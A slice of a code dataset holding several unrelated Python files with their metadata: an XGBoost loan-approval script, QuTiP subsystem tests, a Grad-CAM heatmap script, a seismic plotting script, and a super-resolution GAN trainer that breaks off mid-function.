#df[\"biggerEMI\"] = (df[\"Existing_EMI\"] <= df[\"EMI\"]) \n\n return df\n\ndef trainXGModel(train):\n target = train['Approved']\n train['Approved'] = train['Approved'].astype('category')\n \n train = train.drop(['Approved', 'ID'], axis=1) \n \n currentTime = datetime.datetime.now().isoformat()\n print(\"Train time begin:\", currentTime)\n print(\"For model\", train)\n xgModel = xgb.XGBClassifier(learning_rate = 0.3, n_estimators=20).fit(train, target)\n finishTime = datetime.datetime.now().isoformat()\n print(\"Train time finish:\", finishTime)\n return xgModel\n\ndef predictXGModel(XGModel, test):\n testID = test['ID'] \n test = test.drop(['ID'], axis = 1)\n \n predictions = XGModel.predict(test)\n\n \n results = pd.DataFrame()\n results['ID'] = testID\n results['Approved'] = predictions\n\n return results\n\ndef lastResults(test):\n results = pd.DataFrame()\n results['ID'] = test['ID']\n results['Approved'] = 0\n \n return results\n\ndef lastResults2(test):\n results = pd.DataFrame()\n results['ID'] = test['ID']\n results['Approved'] = 1\n \n return results\n \n'''\ntrainSubset1 = pd.read_csv(\"../data/trainSubset1.csv\")\ntrainSubset1a = pd.read_csv(\"../data/trainSubset1a.csv\")\ntrainSubset2 = pd.read_csv(\"../data/trainSubset2.csv\")\ntrainSubset3 = pd.read_csv(\"../data/trainSubset3.csv\")\ntrainSubset4 = pd.read_csv(\"../data/trainSubset4.csv\")\n\n\ntestSubset1 = pd.read_csv(\"../data/testSubset1.csv\")\ntestSubset1a = pd.read_csv(\"../data/testSubset1a.csv\")\ntestSubset2 = pd.read_csv(\"../data/testSubset2.csv\")\ntestSubset3 = pd.read_csv(\"../data/testSubset3.csv\")\ntestSubset4 = pd.read_csv(\"../data/testSubset4.csv\")\n'''\n#dataFrameSet = [trainSubset1, trainSubset1a, trainSubset2, trainSubset3, trainSubset4,\n# testSubset1, testSubset1a, testSubset2, testSubset3, testSubset4]\n\ntrainDF = pd.read_csv(\"../data/train.csv\")\ntest= pd.read_csv(\"../data/test.csv\")\n\nfor col in ['Employer_Category2', 'Var1']:\n test[col] = test[col].astype('category')\n trainDF[col] = trainDF[col].astype('category')\ncols_to_transform = ['Gender', 'City_Category', 'Employer_Category1', 'LeadCreationDOW',\n 'Employer_Category2', 'Source_Category', 'Var1', 'Primary_Bank_Type', 'Contacted'] \n \ntest = pd.get_dummies(test, columns = cols_to_transform)\ntrainDF = pd.get_dummies(trainDF, columns = cols_to_transform)\n\ntrainDF = addCities(trainDF)\ntrainDF = addSource(trainDF)\ntrainDF = addBank(trainDF)\ntest = addCities(test)\ntest = addSource(test)\ntest = addBank(test)\n\ntrainApprove = trainDF[trainDF[\"Approved\"] == 1]\nnrow = trainApprove.shape[0]\ntrainNill = trainDF[trainDF[\"Approved\"] == 0]\ntrainNotApprove = trainNill.sample(nrow - 204)\n\ntrain = pd.DataFrame()\ntrain = train.append(trainApprove)\ntrain = train.append(trainNotApprove)\n\n\ntrain = train.drop(['City_Code', 'Source', 'Customer_Existing_Primary_Bank_Code'], axis = 1)\ntest = test.drop(['City_Code', 'Source', 'Customer_Existing_Primary_Bank_Code'], axis = 1)\n\n\n\ntrainCols = train.columns.tolist()\ntestCols = test.columns.tolist()\n\ntrainCols.remove(\"Approved\")\ntest.columns = trainCols\n\n\ntrainSubset1 = train[train['Interest_Rate'].isnull() == 0]\ntrainSubset1a = train[(train['Existing_EMI'].isnull() == 0) & (train['Interest_Rate'].isnull() == 0)]\nremoveMissingEEMI = train[train['Existing_EMI'].isnull() == 0]\ntrainSubset2 = removeMissingEEMI[removeMissingEEMI['Loan_Amount'].isnull() == 0]\ntrainSubset3 = removeMissingEEMI\ntrainSubset4 = train[train['Interest_Rate'].isnull() & train['Existing_EMI'].isnull()]\n\ntestSubset1 = test[(test['Interest_Rate'].isnull() == 0) & (test['Existing_EMI'].isnull() == 1)] #Set so we don't need to use Existing EMI column to predict\ntestSubset1a = test[test['Interest_Rate'].isnull() == 0] #Set we can use EMI to predict\nremoveMissingEEMI = test[test['Existing_EMI'].isnull() == 0]\ntestSubset2 = removeMissingEEMI[removeMissingEEMI['Loan_Amount'].isnull() == 0 & removeMissingEEMI['Interest_Rate'].isnull()] \ntestSubset3 = removeMissingEEMI[removeMissingEEMI['Loan_Amount'].isnull()]\ntestSubset4 = test[test['Interest_Rate'].isnull() & test['Existing_EMI'].isnull()] #All Values here are zero\n\nfor sets in [trainSubset1, trainSubset1a, trainSubset2, testSubset1, testSubset1a, testSubset2]:\n sets = addMoneyFeature(sets)\n\nfor sets in [trainSubset1, trainSubset1a, testSubset1, testSubset1a]:\n sets = addEMIFeature(sets)\n\ntrainSubset1m = trainSubset1.drop('Existing_EMI', axis = 1)\nxgModel1 = trainXGModel(trainSubset1m)\nxgModel1a = trainXGModel(trainSubset1a)\n\n#trainSubset2 = trainSubset2.drop(['Interest_Rate', 'EMI'], axis = 1)\nxgModel2 = trainXGModel(trainSubset2)\n\ntrainSubset3 = trainSubset3.drop(['Interest_Rate', 'EMI', 'Loan_Amount', 'Loan_Period'], axis = 1)\nxgModel3 = trainXGModel(trainSubset3)\n\ntestSubset1m = testSubset1.drop('Existing_EMI', axis = 1)\nresults1 = predictXGModel(xgModel1, testSubset1m)\n\ntestSubset1b = testSubset1a.drop('Existing_EMI', axis = 1)\nresults1c = predictXGModel(xgModel1a, testSubset1a)\nresults1b = predictXGModel(xgModel1, testSubset1b)\n\nresults1a = pd.DataFrame()\nresults1a[\"Approved\"] = results1c[\"Approved\"] * 0.6 + results1b[\"Approved\"] * 0.4\nresults1a[\"ID\"] = results1b[\"ID\"]\n\n#testSubset2 = testSubset2.drop(['Interest_Rate', 'EMI'], axis = 1)\nresults2 = predictXGModel(xgModel2, testSubset2)\n\n\ntestSubset3 = testSubset3.drop(['Interest_Rate', 'EMI', 'Loan_Amount', 'Loan_Period'], axis = 1)\nresults3 = predictXGModel(xgModel3, testSubset3)\nresults4 = lastResults(testSubset4)\n\n\nresults = pd.DataFrame()\nresults = results.append(results1)\nresults = results.append(results1a)\nresults = results.append(results2)\nresults = results.append(results3)\nresults = results.append(results4)\n\n\nresults.to_csv(\"../results/newFeatures.csv\", index = False)\n","sub_path":"code/modelPrediction.py","file_name":"modelPrediction.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"476890962","text":"# This file is part of QuTiP: Quantum Toolbox in Python.\n#\n# Copyright (c) 2011 and later, Paul D. Nation and Robert J. Johansson.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the QuTiP: Quantum Toolbox in Python nor the names\n# of its contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\n# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n###############################################################################\n\nfrom numpy.linalg import norm\nfrom numpy.testing import assert_, run_module_suite\n\nfrom qutip.random_objects import rand_dm, rand_unitary, rand_kraus_map\nfrom qutip.subsystem_apply import subsystem_apply\nfrom qutip.superop_reps import kraus_to_super\nfrom qutip.superoperator import mat2vec, vec2mat\nfrom qutip.tensor import tensor\nfrom qutip.qobj import Qobj\n\n\nclass TestSubsysApply(object):\n \"\"\"\n A test class for the QuTiP function for applying superoperators to\n subsystems.\n The four tests below determine whether efficient numerics, naive numerics\n and semi-analytic results are identical.\n \"\"\"\n\n def test_SimpleSingleApply(self):\n \"\"\"\n Non-composite system, operator on Hilbert space.\n \"\"\"\n rho_3 = rand_dm(3)\n single_op = rand_unitary(3)\n analytic_result = single_op * rho_3 * single_op.dag()\n naive_result = subsystem_apply(rho_3, single_op, [True],\n reference=True)\n efficient_result = subsystem_apply(rho_3, single_op, [True])\n naive_diff = (analytic_result - naive_result).data.todense()\n efficient_diff = (efficient_result - analytic_result).data.todense()\n assert_(norm(naive_diff) < 1e-12 and norm(efficient_diff) < 1e-12)\n\n def test_SimpleSuperApply(self):\n \"\"\"\n Non-composite system, operator on Liouville space.\n \"\"\"\n rho_3 = rand_dm(3)\n superop = kraus_to_super(rand_kraus_map(3))\n analytic_result = vec2mat(superop.data.todense() *\n mat2vec(rho_3.data.todense()))\n\n naive_result = subsystem_apply(rho_3, superop, [True],\n reference=True)\n naive_diff = (analytic_result - naive_result).data.todense()\n assert_(norm(naive_diff) < 1e-12)\n\n efficient_result = subsystem_apply(rho_3, superop, [True])\n efficient_diff = (efficient_result - analytic_result).data.todense()\n assert_(norm(efficient_diff) < 1e-12)\n\n def test_ComplexSingleApply(self):\n \"\"\"\n Composite system, operator on Hilbert space.\n \"\"\"\n rho_list = list(map(rand_dm, [2, 3, 2, 3, 2]))\n rho_input = tensor(rho_list)\n single_op = rand_unitary(3)\n\n analytic_result = rho_list\n analytic_result[1] = single_op * analytic_result[1] * single_op.dag()\n analytic_result[3] = single_op * analytic_result[3] * single_op.dag()\n analytic_result = tensor(analytic_result)\n\n naive_result = subsystem_apply(rho_input, single_op,\n [False, True, False, True, False],\n reference=True)\n naive_diff = (analytic_result - naive_result).data.todense()\n assert_(norm(naive_diff) < 1e-12)\n\n efficient_result = subsystem_apply(rho_input, single_op,\n [False, True, False, True, False])\n efficient_diff = (efficient_result - analytic_result).data.todense()\n assert_(norm(efficient_diff) < 1e-12)\n\n def test_ComplexSuperApply(self):\n \"\"\"\n Superoperator: Efficient numerics and reference return same result,\n acting on non-composite system\n \"\"\"\n rho_list = list(map(rand_dm, [2, 3, 2, 3, 2]))\n rho_input = tensor(rho_list)\n superop = kraus_to_super(rand_kraus_map(3))\n\n analytic_result = rho_list\n analytic_result[1] = Qobj(vec2mat(superop.data.todense() *\n mat2vec(analytic_result[1].data.todense())))\n analytic_result[3] = Qobj(vec2mat(superop.data.todense() *\n mat2vec(analytic_result[3].data.todense())))\n analytic_result = tensor(analytic_result)\n\n naive_result = subsystem_apply(rho_input, superop,\n [False, True, False, True, False],\n reference=True)\n naive_diff = (analytic_result - naive_result).data.todense()\n assert_(norm(naive_diff) < 1e-12)\n\n efficient_result = subsystem_apply(rho_input, superop,\n [False, True, False, True, False])\n efficient_diff = (efficient_result - analytic_result).data.todense()\n assert_(norm(efficient_diff) < 1e-12)\n\n\nif __name__ == \"__main__\":\n run_module_suite()\n","sub_path":"qutip/tests/test_subsys_apply.py","file_name":"test_subsys_apply.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"123307009","text":"import matplotlib.pyplot as plt\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications.vgg16 import VGG16, preprocess_input, decode_predictions\nimport numpy as np\nimport cv2\n\nimg_path = 'save/wiki_cat1.jpg'\nimg = image.load_img(img_path, target_size=(224, 224))\nx = image.img_to_array(img)\nx = np.expand_dims(x, axis=0)\n\nx = preprocess_input(x)\n\nmodel = VGG16(weights='imagenet')\n\npreds = model.predict(x)\nprint('Predicted:', decode_predictions(preds, top=3))\n\nlast_conv_layer = model.get_layer('block5_conv3')\ncat_output = model.output[:,386]\ngrads = K.gradients(cat_output, last_conv_layer.output)[0]\n\npooled_grads = K.mean(grads, axis=(0,1,2))\ngrads = K.function([model.input], [pooled_grads, last_conv_layer.output[0]])\n\niterate = K.function([model.input], [pooled_grads, last_conv_layer.output[0]])\n\npooled_grads_value, conv_layer_value = iterate([x])\n\nfor i in range(512):\n conv_layer_value[:, :, 1] *= pooled_grads_value[i]\n\nheatmap = np.mean(conv_layer_value, axis=-1)\nheetmap = np.maximum(heatmap, 0)\nheatmap /= np.max(heatmap)\n# plt.matshow(heatmap)\n# plt.show()\n\nimg = cv2.imread(img_path)\nheatmap = cv2.resize(heatmap, (img.shape[1], img.shape[0]))\nheatmap = np.uint8(255 * heatmap)\nheatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)\nsuperimposed_img = heatmap * 0.4 + img\ncv2.imwrite('output/vgg_heatmap1.png', superimposed_img)\n\n","sub_path":"chap5/heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"214107700","text":"'''\nCreated on Apr 30, 2012\n\n@author: Sean Ross-Ross, Matt Hall, Evan Bianco\n'''\nimport numpy as np\nimport matplotlib\n\nimport matplotlib.pyplot as plt\n\nfrom argparse import ArgumentParser\n\nfrom modelr.web.urlargparse import rock_properties_type\n\nfrom modelr.web.util import multi_plot\n\nimport modelr.modelbuilder as mb\nfrom modelr.web.defaults import default_parsers\nfrom svgwrite import rgb\n\nshort_description = ('Look at plots '\n 'across spatial, offset, and frequency '\n 'cross-sections')\n\n\ndef add_arguments(parser):\n\n default_parser_list = [\n 'title',\n 'colourmap',\n 'wiggle_skips',\n 'aspect_ratio',\n 'base1','base2','overlay1','overlay2',\n 'opacity'\n ]\n \n default_parsers(parser,default_parser_list)\n\n parser.add_argument('f',\n type=float,\n default=10.0,\n help=\"Wavelet CF to use for cross section\")\n\n parser.add_argument('theta',\n type=float,\n default=20.0,\n help=\"Offset angle to use for cross section\")\n \n parser.add_argument('slice',\n type=str,\n help='Slice to return',\n default='spatial',\n choices=['spatial', 'angle', 'frequency']\n )\n \n parser.add_argument('trace',\n type=int,\n help='Trace to use for non-spatial cross section',\n default=150\n )\n \n parser.add_argument('tslice',\n type=float, \n help='time [s] along which to plot instantaneous amplitude ',\n required=True,\n default=0.050\n )\n\n return parser\n\ndef run_script(earth_model, seismic_model, plot_args):\n\n # Get the axis\n traces = range(seismic_model.seismic.shape[1])\n f = seismic_model.wavelet_cf()\n theta = seismic_model.offset_angles()\n plot_args.xscale = seismic_model.f_res\n\n \n return multi_plot(earth_model.get_data(),\n seismic_model.reflectivity,\n seismic_model.seismic, traces, f, theta,\n plot_args)\n \n \n\n \nif __name__ == '__main__':\n main()\n","sub_path":"modelr/web/scripts/plots/modelr_plot.py","file_name":"modelr_plot.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"312334373","text":"'''\nCreated on Apr 18, 2019\n\n@author: gjpicker\n'''\n# -*- coding: utf-8 -*- \nfrom __future__ import absolute_import \nfrom collections import OrderedDict\n# from . import model as model \n\nimport model2 as model \n\nimport torch \nimport torch.nn as nn \n#import torch.optim as optim\nimport torch.optim\nfrom torch.optim import lr_scheduler\n\nimport itertools\n\nimport time \nimport math \nimport tqdm\n\nimport numpy as np \n\nfrom networks import *\n#=====START: ADDED FOR DISTRIBUTED======\nfrom distributed import init_distributed, apply_gradient_allreduce, reduce_tensor\nfrom torch.utils.data.distributed import DistributedSampler\n#=====END: ADDED FOR DISTRIBUTED======\n\nimport torch.nn.functional as F \n\nimport torch.utils.data as t_data\n\nfrom utils.visualizer import Visualizer\nimport utils.util as util\n\n#from utils import image_quality\nfrom utils import calculate_PSNR_SSIM as image_quality\nimport utils.common as common \n\n\nclass Treainer(object):\n '''\n loss_1 pixel \n loss_2 vgg_f \n loss_3 g_loss [fake]\n g_vgg_loss \n loss_4 d_loss [fake,true]\n d_vgg_loss \n '''\n def __init__(self,opt=None,train_dt =None,train_dt_warm=None,dis_list=[] , val_dt_warm=None):\n self.device =torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.opt = opt \n\n self.visualizer = Visualizer(opt)\n\n num_gpus = torch.cuda.device_count()\n #dis_list[1]\n self.rank =dis_list[0]\n\n #=====START: ADDED FOR DISTRIBUTED======\n if num_gpus > 1:\n #init_distributed(rank, num_gpus, group_name, **dist_config)\n dist_config= dis_list[3]\n init_distributed(dis_list[0], dis_list[1], dis_list[2], **dist_config)\n #=====END: ADDED FOR DISTRIBUTED======\n\n\n if opt.ge_net ==\"srfeat\":\n raise Exception(\"not support multi-scale\")\n# self.netG= model.G() \n elif opt.ge_net ==\"carn\":\n self.netG= model.G1()\n elif opt.ge_net ==\"carnm\":\n self.netG= model.G2()\n else :\n raise Exception(\"unknow \")\n \n \n dis_net_str = opt.dis_net if hasattr(opt,\"dis_net\") else \"nlayer\"\n if dis_net_str==\"fc\":\n self.netD = model.D()\n# self.netD_vgg= model. D(input_c=512,input_width=18) \n elif dis_net_str==\"nlayer\":\n self.netD = model.NLayerDiscriminator(input_nc=3)\n# self.netD_vgg= model. PixelDiscriminator(input_nc=512) \n \n \n if opt.vgg_type ==\"style\":\n self.vgg = load_vgg16(opt.vgg_model_path + '/models')\n elif opt.vgg_type ==\"classify\" :\n self.vgg = model. vgg19_withoutbn_customefinetune()\n \n self.vgg.eval()\n for param in self.vgg.parameters():\n param.requires_grad = False\n\n# for p in self.vgg.parameters():\n# p.requires_grad = False\n\n\n init_weights(self.netD,init_type=opt.init)\n init_weights(self.netG,init_type=opt.init)\n \n self.vgg= self.vgg.to(self.device)\n self.netD= self.netD.to(self.device)\n# self.netD_vgg= self.netD_vgg.to(self.device)\n self.netG= self.netG.to(self.device)\n\n print (\"======\"*8)\n print (self.vgg)\n print (\"======\"*8)\n print (self.netD)\n# print (\"======\"*8)\n# print (self.netD_vgg)\n print (\"======\"*8)\n print (self.netG)\n\n #=====START: ADDED FOR DISTRIBUTED======\n if num_gpus > 1:\n #self.vgg = apply_gradient_allreduce(self.vgg)\n# self.netD_vgg = apply_gradient_allreduce(self.netD_vgg)\n self.netD = apply_gradient_allreduce(self.netD)\n self.netG = apply_gradient_allreduce(self.netG)\n \n #=====END: ADDED FOR DISTRIBUTED======\n\n\n self.optim_G= torch. optim.Adam(filter(lambda p: p.requires_grad, self.netG.parameters()),\\\n lr=opt.warm_opt.lr, betas=opt.warm_opt.betas, weight_decay=0.0)\n \n \n if opt.dis.optim ==\"sgd\":\n self.optim_D= torch.optim.SGD( filter(lambda p: p.requires_grad, \\\n itertools.chain(self.netD.parameters() ) ),\\\n lr=opt.dis.lr,\n )\n elif opt.dis.optim ==\"adam\":\n self.optim_D= torch.optim.Adam( filter(lambda p: p.requires_grad, \\\n itertools.chain(self.netD.parameters() ) ),\\\n lr=opt.dis.lr,betas=opt.dis.betas, weight_decay=0.0\n )\n else:\n raise Exception(\"unknown\")\n \n \n \n print (\"create schedule \")\n \n lr_sc_G = get_scheduler(self.optim_G,opt.gen )\n lr_sc_D = get_scheduler(self.optim_D,opt.dis )\n self.schedulers = []\n self.schedulers.append(lr_sc_G)\n self.schedulers.append(lr_sc_D)\n \n \n # =====START: ADDED FOR DISTRIBUTED======\n train_dt = torch.utils.data.ConcatDataset([train_dt])\n\n train_sampler = DistributedSampler(train_dt) if num_gpus > 1 else None\n val_sampler_warm = DistributedSampler(val_dt_warm) if num_gpus > 1 else None\n # =====END: ADDED FOR DISTRIBUTED======\n\n kw ={\"pin_memory\":True , \"num_workers\":8 } if torch.cuda.is_available() else {}\n dl_c =t_data.DataLoader(train_dt ,batch_size=opt.batch_size,\\\n sampler=train_sampler , drop_last=True, **kw )\n \n\n dl_val_warm =t_data.DataLoader(val_dt_warm ,batch_size=1, \n sampler=val_sampler_warm , drop_last=True ,**kw)\n\n\n\n self.dt_train = dl_c\n self.dt_val_warm = dl_val_warm\n\n\n if opt.warm_opt.loss_fn==\"mse\":\n self.critic_pixel = torch.nn.MSELoss()\n elif opt.warm_opt.loss_fn==\"l1\":\n self.critic_pixel = torch.nn.L1Loss()\n elif opt.warm_opt.loss_fn==\"smooth_l1\":\n self.critic_pixel = torch.nn.SmoothL1Loss()\n else:\n raise Exception(\"unknown\")\n\n self.critic_pixel=self.critic_pixel.to(self.device)\n \n self.gan_loss = GANLoss(gan_mode=opt.gan_loss_fn).to(self.device)\n print (\"init ....\")\n \n\n self.save_dir = os.path.dirname( self.visualizer. log_name )\n\n \n\n def _validate_(self):\n with torch.no_grad():\n print (\"val ,\"*8,\"warm start...\",len(self.dt_val_warm))\n iter_start_time = time.time()\n ssim = []\n batch_loss = []\n psnr = []\n\n save_image_list_1 = []\n\n lr_list = []\n hr_list = []\n sr_list = []\n img_list= [] \n \n for ii,data in tqdm.tqdm( enumerate(self.dt_val_warm) ):\n if type(data)== dict :\n input_lr ,input_hr = data[\"LR\"] ,data[\"HR\"]\n #cubic_hr = F.upsample(input_lr, scale_factor=4 , mode = \"trilinear\")\n else : \n if len(data)>3:\n input_lr ,input_hr , cubic_hr,_,_ =data\n else :\n input_lr ,input_hr , cubic_hr =data\n\n assert input_lr.size(0)==1 ,\"batchsize is 1 \"\n self. input_lr = input_lr .to(self.device)\n self. input_hr = input_hr .to(self.device)\n\n self.forward()\n\n self.input_lr=F.upsample(self.input_lr,scale_factor=4)\n \n self.output_hr = common.Tensor2np(self.output_hr.mul_(255.).detach().cpu().squeeze_(0))\n self.input_hr = common.Tensor2np(self.input_hr.mul_(255.).detach().cpu().squeeze_(0))\n self.input_lr = common.Tensor2np(self.input_lr.mul_(255.).detach().cpu().squeeze_(0))\n \n\n sr_list.append(self.output_hr)\n hr_list.append(self.input_hr)\n\n img_list .append(np.concatenate([self.input_lr,self.output_hr,self.input_hr],axis=0) )\n\n data_ssim,data_psnr = image_quality .go_calc(list(zip(sr_list,hr_list)) ,False) \n \n \n for i,img_item in enumerate(img_list):\n save_image_list = OrderedDict([\n (\"lr_sr_hr\", img_item ),\n ] ) \n self.visualizer.display_current_results(save_image_list,self.epoch, save_result=True, offset=20+i,title=\"val_imag\")\n\n #val_info = (np.mean(ssim),np.mean(psnr) )\n val_info = (data_ssim,data_psnr )\n errors = dict(zip ( (\"ssim\",\"psnr\") , val_info ) ) \n t = (time.time() - iter_start_time) \n self.visualizer.print_current_errors(self.epoch , self.epoch, errors, t,log_name=\"loss_log_val.txt\")\n self.visualizer.plot_current_errors(self.epoch , self.epoch,opt=None,errors=errors,display_id_offset=3,loss_name=\"val\")\n\n return val_info\n\n\n def run(self):\n self.load_networks()\n self._run_train()\n\n\n def _run_train(self):\n print (\"train.i...\"*8)\n total_steps=0\n opt= self.opt\n\n self.model_names = [\"G\",\"D\"]\n\n self.loss_w_g=torch.tensor(0)\n dataset_size= len(self.dt_train) * opt.batch_size \n best_loss = 10e5\n\n for epoch in range(0 , self.opt.epoches_warm +self.opt.epoches):\n self.epoch = epoch\n# epoch_start_time = time.time()\n epoch_iter = 0\n\n val_loss = self._validate_()\n val_loss = val_loss[0]\n if best_loss > val_loss:\n best_loss= val_loss\n self.save_networks(\"best\")\n self.save_networks(epoch)\n\n\n for data in self.dt_train :\n\n\n scale=4\n if True :\n hr_2,input_lr_2 ,hr_3,input_lr_3,hr_4,input_lr =data[0][0],data[0][1], data[1][0],data[1][1], data[2][0],data[2][1] \n scale = np.random.choice([2,3,4])\n self. input_cubic_hr = hr_4.clone()\n\n if scale==3 :\n input_hr= hr_3\n self. input_lr = input_lr_3 .to(self.device)\n #self. input_hr = input_hr[:,:,1:-1,1:-1] .to(self.device)\n self. input_hr = hr_3.to(self.device)#input_hr[:,:,1:-1,1:-1] .to(self.device)\n elif scale==2 :\n self. input_lr = input_lr_2 .to(self.device)\n self.input_hr = hr_2.to(self.device)\n else:\n self. input_lr = input_lr .to(self.device)\n self.input_hr = hr_4.to(self.device)\n \n \n\n iter_start_time = time.time()\n\n self.forward(scale=scale)\n\n self.optim_G .zero_grad ()\n self.g_loss()\n self.optim_G.step()\n\n\n self.optim_D .zero_grad ()\n self.d_loss()\n self.optim_D.step()\n\n\n self.visualizer.reset()\n total_steps += opt.batch_size\n epoch_iter += opt.batch_size\n\n if total_steps % opt.display_freq == 0:\n save_result = total_steps % opt.update_html_freq == 0\n self.visualizer.display_current_results(self.get_current_visuals(), epoch, save_result)\n\n if total_steps % opt.print_freq == 0:\n errors = self.get_current_errors()\n t = (time.time() - iter_start_time) / opt.batch_size\n self.visualizer.print_current_errors(epoch , epoch_iter, errors, t)\n if opt.display_id > 0:\n self.visualizer.plot_current_errors(epoch, float(epoch_iter)/dataset_size , opt, errors)\n\n\n if self.rank !=0 :\n continue\n lr_g,lr_d=self.update_learning_rate(is_warm=False)\n self.visualizer.plot_current_lrs(epoch,0,opt=None,\\\n errors=OrderedDict([ ('lr_warm_g',0),(\"lr_g\",lr_g),(\"lr_d\",lr_d) ]) , loss_name=\"lr_warm\" ,display_id_offset=1)\n\n \n \n def forward(self,scale=4):\n self.output_hr = self.netG(self.input_lr,scale=scale)\n# self.input_hr \n pass \n \n \n \n def g_loss (self,):\n #print (self.opt.gen,type(self.opt.gen),self.opt.gen.keys())\n vgg_r = self.opt.gen.lambda_vgg_input\n #g feature f \n x_f_fake= self.vgg(vgg_r * self.output_hr) \n# x_f_real= self.vgg(vgg_r * self.input_hr) \n x_f_real= self.vgg(vgg_r * self.input_hr) \n \n #g .. f \n d_fake = self.netD(self.output_hr)\n self.loss_G_g = self.opt.gen.lambda_vgg_loss * self.gan_loss (d_fake,True )\n\n self.loss_G_fg = 0 \n# fd_fake = self.netD_vgg(x_f_fake)\n# self.loss_G_fg = self.opt.gen.lambda_vgg_loss * self.gan_loss (fd_fake,True )\n\n ## perception \n self.loss_G_p = self.critic_pixel (x_f_fake,x_f_real )\n\n\n self.loss_w_g = self.opt.warm_opt.lambda_warm_loss* self.critic_pixel(self.output_hr , self.input_hr )\n\n self.loss_g = self.loss_G_g + self.loss_G_fg + self.loss_G_p \n\n self.loss_g.backward()\n \n if hasattr(self.opt.warm_opt, \"clip\"):\n nn.utils.clip_grad_norm(self.netG.parameters(), self.opt.warm_opt.clip)\n \n def d_loss (self,):\n d_fake = self.netD(self.output_hr.detach())\n d_real = self.netD(self.input_hr)\n \n \n self.loss_D_f = self.gan_loss (d_fake,False )\n self.loss_D_r = self.gan_loss (d_real,True )\n \n if self.opt.gan_loss_fn ==\"wgangp\":\n\n gradient_penalty,_ = cal_gradient_penalty(netD=self.netD, real_data=self.input_hr.data, \\\n fake_data = self.output_hr.data, device=self.device)\n gradient_penalty.backward()\n\n loss_d =self.loss_D_f+ self.loss_D_r \n loss_d.backward()\n \n def get_current_errors(self):\n return OrderedDict([('G_p', self.loss_G_p.item() if hasattr(self,\"loss_G_p\") else 0 ),\n ('G_g', self.loss_G_g.item() if hasattr(self,\"loss_G_g\") else 0 ),\n ('D_real', self.loss_D_r.item() if hasattr(self,\"loss_D_r\") else 0 ) ,\n ('D_fake', self.loss_D_f.item() if hasattr(self,\"loss_D_f\") else 0 ),\n ('warm_p', self.loss_w_g.item() if hasattr(self,\"loss_w_g\") else 0 ),\n ])\n\n def get_current_visuals(self):\n def mmsize(v,size):\n if v.shape[0]!=size:\n dl = (v.shape[0]-size)//2\n return v[dl:-dl,dl:-dl,:] \n return v\n input_lr=F.upsample(self.input_lr,scale_factor=self.input_hr.size(-1)//self.input_lr.size(-1) )\n\n input =mmsize( util.tensor2im( input_lr ) ,self.input_hr.size(-1) )\n target =mmsize( util.tensor2im(self.input_hr) ,self.input_hr.size(-1) )\n fake =mmsize( util.tensor2im(self.output_hr.detach() ) , self.input_hr.size(-1) )\n #mmz = min([input.shape[0] ,target.shape[0],fake.shape[0] ] )\n \n return OrderedDict([('input', input), ('fake', fake), ('target', target)])\n\n def update_learning_rate(self,is_warm =True ):\n if True:\n for scheduler in self.schedulers:\n scheduler.step()\n\n lr_g = self.optim_G.param_groups[0]['lr']\n lr_d = self.optim_D.param_groups[0]['lr']\n return (lr_g,lr_d)\n \n def save_networks(self, epoch):\n \"\"\"Save all the networks to the disk.\n Parameters:\n epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)\n \"\"\"\n for name in self.model_names:\n if isinstance(name, str):\n save_filename = '%s_net_%s.pth' % (epoch, name)\n save_path = os.path.join(self.save_dir, save_filename)\n net = getattr(self, 'net' + name)\n\n if \"parallel\" in str(type(net)) and torch.cuda.is_available():\n torch.save(net.module.cpu().state_dict(), save_path)\n net.cuda(self.gpu_ids[0])\n else:\n torch.save(net.cpu().state_dict(), save_path)\n\n net.to(self.device)\n\n\n\n def load_networks(self, epoch=None):\n \"\"\"Load all the networks from the disk.\n Parameters:\n epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)\n \"\"\"\n pth_list= [os.path.basename(x) for x in os.listdir(self.save_dir)]\n pth_list= [x.split(\"_\")[0] for x in pth_list if \"_net\" in x and \".pth\" in x and \"best\" not in x ]\n pth_list=sorted(pth_list)[:-1]\n pth_list=list( map(int, pth_list))\n pth_list=sorted(pth_list)\n current_epoch = 0 \n try:\n current_epoch= int(pth_list[-1])\n except :\n pass\n\n if 